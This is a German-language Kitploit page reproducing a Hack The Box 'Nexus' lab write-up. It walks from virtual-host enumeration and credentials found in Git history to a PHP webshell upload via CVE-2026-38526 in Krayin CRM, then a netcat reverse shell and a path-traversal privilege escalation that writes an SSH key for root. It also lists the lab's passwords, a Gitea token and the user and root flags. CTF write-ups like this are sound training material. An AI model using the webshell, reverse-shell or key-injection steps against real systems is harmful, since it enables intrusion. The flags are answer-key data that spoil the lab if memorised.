Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
htb-labs-nexus — # Hack The Box Nexus-Maschinen-Write-up mit Aufklärung, Gitea-Credential-Erkennung, Krayin-CRM-Ausnutzung über CVE-2026-38526, initialem Zugriff und Privilege-Eskalation über einen verwundbaren Gitea-Template-Synchronisierungsdienst. | Kitploit
Tools/GitHubGitHub/diegorivas1/htb-labs-nexus
Privilege EscalationAufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitCTFPenetrationstestsLernen & BildungLabs & Praxis
GitHubdiegorivas1/htb-labs-nexus

htb-labs-nexus

vor 8h 2mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

# Hack The Box Nexus-Maschinen-Write-up mit Aufklärung, Gitea-Credential-Erkennung, Krayin-CRM-Ausnutzung über CVE-2026-38526, initialem Zugriff und Privilege-Eskalation über einen verwundbaren Gitea-Template-Synchronisierungsdienst.

Repository anzeigen

🏴‍☠️ HTB Labs - Nexus

English 🇺🇸 | Español 🇪🇸

English | Español

HTB Difficulty OS Platform


📋 Übersicht

Nexus ist eine Linux-Maschine mit einfachem Schwierigkeitsgrad von Hack The Box, die eine mehrstufige Angriffskette demonstriert, die virtuelle Host-Enumeration, offengelegte Zugangsdaten, verwundbare Webanwendungsfunktionen, Remote-Code-Ausführung, Wiederverwendung von Zugangsdaten und lokale Privilegienerweiterung umfasst.

Angriffskette

root@kitploit:~
Reconnaissance
      │
      ▼
Virtual Host Enumeration
      │
      ├── git.nexus.htb
      └── billing.nexus.htb
              │
              ▼
      Gitea Commit History
              │
              ▼
       Exposed Credentials
              │
              ▼
        Krayin CRM Login
              │
              ▼
      CVE-2026-38526
              │
              ▼
        PHP Webshell
              │
              ▼
       Reverse Shell
        (www-data)
              │
              ▼
       Application .env
              │
              ▼
        SSH as jones
              │
              ▼
   gitea-template-sync
              │
              ▼
       Path Traversal
              │
              ▼
    Malicious Git Repository
              │
              ▼
         SSH as root

Wichtige Techniken

  • 🔍 Virtuelle Host-Enumeration
  • 🔑 Zugangsdaten-Entdeckung durch Git-Commit-Verlauf
  • 💻 Krayin-CRM-Ausnutzung
  • 🐚 PHP-Webshell und Reverse Shell
  • 🔐 Wiederverwendung von Zugangsdaten
  • 🔬 Linux-Dienst-Enumeration
  • 📂 Path Traversal
  • 🌳 Erstellung eines bösartigen Git-Repositorys
  • 👑 Privilegienerweiterung auf root

Ziel-IP: 10.129.82.92


🔍 Phase 1 Reconnaissance

Port-Scan

root@kitploit:~
nmap -p- -sV -sC -oN nexus_full_scan.txt 10.129.82.92

Ergebnisse

root@kitploit:~
22/tcp  open  ssh   OpenSSH 9.6p1 Ubuntu
80/tcp  open  http  nginx 1.24.0 (Ubuntu)

Virtuelle Host-Enumeration

root@kitploit:~
gobuster vhost \
-u http://nexus.htb \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
--append-domain

Entdeckte Hosts

root@kitploit:~
git.nexus.htb       → Gitea
billing.nexus.htb   → Krayin CRM

Fügen Sie die entdeckten Hosts zu /etc/hosts hinzu:

root@kitploit:~
echo "10.129.82.92 nexus.htb git.nexus.htb billing.nexus.htb" | sudo tee -a /etc/hosts

🔑 Phase 2 Zugangsdaten-Entdeckung

Gitea-Enumeration

Navigieren Sie zu:

root@kitploit:~
http://git.nexus.htb

Ein Repository namens:

root@kitploit:~
admin/krayin-docker-setup

enthält nützliche Informationen in seiner Git-Historie.

Die .env-Datei kann aus früheren Commits wiederhergestellt werden und legt Zugangsdaten offen, die in der aktuellen Version nicht mehr vorhanden sind.

Entdeckte Zugangsdaten

DienstBenutzernamePasswort
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04

Die E-Mail-Adresse [email protected] wurde auch im Bereich „Beschäftigung“ der Hauptwebsite identifiziert.


💻 Phase 3 CVE-2026-38526 : Krayin CRM

CRM-Login

root@kitploit:~
URL: http://billing.nexus.htb/admin/login

E-Mail: [email protected]
Passwort: N27xh!!2ucY04

Hochladen der Webshell

Navigieren Sie zu:

root@kitploit:~
/admin/mail/sent

Dann:

  1. Klicken Sie auf E-Mail verfassen.
  2. Hängen Sie das PHP-Payload an.
  3. Fangen Sie die Anfrage mit Burp Suite ab.
  4. Ändern Sie den hochgeladenen Dateinamen.
  5. Ändern Sie den MIME-Typ.
  6. Leiten Sie die Anfrage weiter.

Das Payload wird gespeichert unter:

root@kitploit:~
exploits/CVE-2026-38526/shell.php

Payload:

root@kitploit:~
<?php system($_GET["cmd"]); ?>

Die relevanten Multipart-Felder sind:

root@kitploit:~
Content-Disposition: form-data; name="attachments[]"; filename="shell.php"
Content-Type: application/x-php

Webshell

Nach erfolgreichem Upload:

root@kitploit:~
http://billing.nexus.htb/storage/emails/2/shell.php?cmd=id

Erwartetes Ergebnis:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

📡 Phase 4 Reverse Shell

Starten Sie einen Listener:

root@kitploit:~
nc -lvnp 4444

Lösen Sie dann die Reverse Shell über die hochgeladene Webshell aus.

Die Python-Implementierung ist verfügbar unter:

root@kitploit:~
exploits/CVE-2026-38526/reverse_shell.py

In dieser Phase wird die Shell erhalten als:

root@kitploit:~
www-data

🐚 Phase 5 Benutzerzugriff

Anwendungskonfiguration lesen

Untersuchen Sie die Krayin-Konfiguration:

root@kitploit:~
cat /var/www/krayin/.env

Zugangsdaten werden gefunden:

root@kitploit:~
DB_USERNAME=krayin
DB_PASSWORD=y27xb3ha!!74GbR

Benutzer aufzählen

root@kitploit:~
cat /etc/passwd | grep sh$

Das Konto jones wird identifiziert.

SSH als jones

root@kitploit:~
ssh [email protected]

Passwort:

root@kitploit:~
y27xb3ha!!74GbR

Benutzer-Flag

root@kitploit:~
f20cbf9aeb6bb228d356a42ff49c1933

🔬 Phase 6 Privilegienerweiterung

Dienste aufzählen

root@kitploit:~
systemctl list-units | grep -i gitea

Der folgende Dienst und Timer werden identifiziert:

root@kitploit:~
gitea-template-sync.timer
gitea-template-sync.service

Der Dienst wird mit erhöhten Rechten ausgeführt.

Verwundbares Skript

root@kitploit:~
/etc/gitea/template-sync.py

Der Synchronisierungsmechanismus verwendet eine Pfadkonstruktion, die durch Path Traversal missbraucht werden kann.


🎯 Phase 7 Bösartiges Git-Repository

Generieren Sie ein SSH-Schlüsselpaar:

root@kitploit:~
ssh-keygen -t ed25519 -f /tmp/nexus_root -N ""
cat /tmp/nexus_root.pub

Der Exploit zur Manipulation von Git-Objekten befindet sich unter:

root@kitploit:~
exploits/gitea_template_sync/exploit_git.py

Erstellen Sie das Repository:

root@kitploit:~
cd /tmp
rm -rf exploit
mkdir exploit
cd exploit

git init
python3 exploit_git.py

Das Repository muss den Zweig:

root@kitploit:~
main

verwenden.

Gitea-Token

Generieren Sie ein persönliches Zugriffstoken über:

root@kitploit:~
http://git.nexus.htb

Navigieren Sie zu:

root@kitploit:~
Einstellungen → Anwendungen

Konfigurieren Sie dann das Remote:

root@kitploit:~
git remote set-url origin http://jones:[email protected]/jones/exploit.git

Schieben Sie das bösartige Repository:

root@kitploit:~
git push -f origin main

⏰ Phase 8 Vorlagen-Synchronisierung

Überwachen Sie das Synchronisierungsprotokoll:

root@kitploit:~
tail -f /var/log/template-sync.log

Eine erfolgreiche Synchronisierung führt dazu, dass der bösartige Git-Baum vom privilegierten Dienst verarbeitet wird.

Beispiel:

root@kitploit:~
[2026-08-27 02:01:30] Syncing template: jones/exploit
[2026-08-27 02:01:30]   synced: ../../../../../root/.ssh/authorized_keys
[2026-08-27 02:01:30] Template sync complete

👑 Phase 9 Root

Sobald der öffentliche SSH-Schlüssel in das Root-Konto geschrieben wurde:

root@kitploit:~
ssh -i /tmp/nexus_root [email protected]

Überprüfen Sie den Zugriff:

root@kitploit:~
whoami

Erwartet:

root@kitploit:~
root

Rufen Sie das Root-Flag ab:

root@kitploit:~
cat /root/root.txt

Root-Flag

root@kitploit:~
85be1d2a3084e387da0e7dd118908c63

🏆 Flags

FlagWert
Userf20cbf9aeb6bb228d356a42ff49c1933
Root85be1d2a3084e387da0e7dd118908c63

🔐 Zugangsdaten

Diese Zugangsdaten gehören zur Hack-The-Box-Laborumgebung, die von diesem Repository dokumentiert wird.


🛠️ Werkzeuge


📁 Repository-Struktur

root@kitploit:~
htb-labs-nexus/
├── README.md
├── exploits/
│   ├── CVE-2026-38526/
│   │   ├── shell.php
│   │   ├── reverse_shell.py
│   │   └── burp_request.txt
│   └── gitea_template_sync/
│       ├── exploit_git.py
│       ├── create_repo.sh
│       └── key.pub
├── scripts/
│   ├── linpeas.sh
│   ├── LinEnum.sh
│   └── enum_services.sh
├── assets/
│   ├── nmap_scan.txt
│   ├── gobuster_vhost.txt
│   └── credentials.txt
├── screenshots/
│   ├── gitea_repo.png
│   ├── crm_login.png
│   ├── webshell.png
│   └── root_flag.png
└── notes/
    ├── methodology.md
    ├── commands.md
    └── credentials.md

📚 Zusätzliche Ressourcen

  • CVE-2026-38526
  • Krayin CRM
  • Gitea-Dokumentation
  • OWASP Path Traversal

⚠️ Haftungsausschluss

Dieses Repository ist ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bestimmt.

Die hier dokumentierten Techniken, Zugangsdaten, Exploits und Befehle dürfen nicht gegen Systeme ohne ausdrückliche Genehmigung verwendet werden.


🎯 Wichtige Erkenntnisse

  1. 🔍 Virtuelle Hosts aufzählen: Wichtige Dienste können hinter Subdomains verborgen sein.
  2. 🔑 Git-Verlauf überprüfen: Das Entfernen eines Geheimnisses aus einer Datei bedeutet nicht, dass es aus der Repository-Historie verschwunden ist.
  3. 💻 Datei-Uploads analysieren: Die Validierung von Erweiterungen und MIME-Typen kann kritische Sicherheitskontrollen sein.
  4. 🐚 Nach Erhalt einer Shell aufzählen: Konfigurationsdateien können wiederverwendbare Zugangsdaten enthalten.
  5. 🔬 Privilegierte Dienste überprüfen: Ein Dienst, der als root läuft, kann ein Vektor für Privilegienerweiterung werden.
  6. 📂 Dateipfade ordnungsgemäß validieren: Unsichere Handhabung von benutzergesteuerten Pfaden kann Path-Traversal-Schwachstellen einführen.
  7. 🌳 Git kann ein Angriffsvektor werden: Git-Objekte und -Bäume können manipuliert werden, wenn eine Anwendung deren Struktur fälschlicherweise vertraut.

🙏 Danksagungen

  • Hack The Box : Maschine und Laborplattform
  • P3lured : Original-Write-up
  • Tran Manh Tan : Ergänzender Leitfaden

⭐ Wenn Ihnen dieses Write-up nützlich war, erwägen Sie, dem Repository einen Stern zu geben.

Tool herunterladen
DienstBenutzernamePasswort / Schlüssel
Krayin CRM[email protected]N27xh!!2ucY04
GiteajonesN27xh!!2ucY04
Gitea-Tokenjones1dd7105bf7e57cad02c5a56af5d92703a7839364
SSHjonesy27xb3ha!!74GbR
SSH Rootroot/tmp/nexus_root
WerkzeugZweck
NmapPort- und Dienst-Enumeration
GobusterVirtuelle Host-Enumeration
Burp SuiteAbfangen und Modifizieren von HTTP-Anfragen
GitRepository-Analyse und Erstellung bösartiger Repositorys
Python 3Exploit-Skripte
NetcatReverse-Shell-Listener
LinEnumLinux-Enumeration
LinPEASEnumeration zur Privilegienerweiterung
SSHFernzugriff